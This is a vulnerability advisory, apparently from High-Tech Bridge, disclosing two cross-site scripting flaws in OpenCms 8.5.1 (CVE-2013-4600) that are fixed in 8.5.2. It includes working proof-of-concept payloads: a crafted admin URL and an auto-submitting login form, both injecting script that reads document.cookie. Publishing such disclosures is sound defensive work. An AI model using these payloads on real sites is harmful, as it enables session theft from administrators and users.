Total Tests:

XSS Vulnerabilities in OpenCms

Advisory ID:HTB23160
Product:OpenCms
Vendor:Alkacon Software
Vulnerable Versions:8.5.1 and probably prior
Tested Version:8.5.1
Advisory Publication:June 12, 2013 [without technical details]
Vendor Notification:June 12, 2013
Vendor Fix:July 10, 2013
Public Disclosure:July 17, 2013
Latest Update:July 11, 2013
Vulnerability Type:Cross-Site Scripting [CWE-79]
CVE Reference:CVE-2013-4600
Risk Level:Medium
CVSSv2 Base Score:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered 2 XSS vulnerabilities in OpenCms, which can be exploited to perform Cross-Site Scripting attacks against users of vulnerable application.

1) Multiple Cross-Site Scripting (XSS) in OpenCms: CVE-2013-4600
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in "title" HTTP GET parameter passed to "/opencms/opencms/system/workplace/views/admin/admin-main.jsp" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display administrator's cookies:
http://[host]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?ac tion=&dialogtype=publishproject&framename=body&title=%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E

1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data in "requestedResource" HTTP POST parameter passed to "/opencms/opencms/system/login/index.html" URL. A remote attacker can trick a logged-in user to open a specially crafted malicious webpage and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display user's cookies:
<form action="http://[host]/opencms/opencms/system/login/index.html" method="post" name="main">
<input type="hidden" name="login" value="true">
<input type="hidden" name="ocPword" value="1">
<input type="hidden" name="ocUname" value="1">
<input type="hidden" name="requestedResource" value='</script><script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to OpenCms 8.5.2

More Information:
http://www.opencms.org/en/news/130710-opencms-v852-releasenotes.html
https://github.com/alkacon/opencms-core/issues/173


References:
[1] High-Tech Bridge Advisory HTB23160 - https://www.immuniweb.com/advisory/HTB23160 - XSS vulnerabilities in OpenCms.
[2] OpenCms - http://www.opencms.org - OpenCms from Alkacon Software is a professional, easy to use website content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential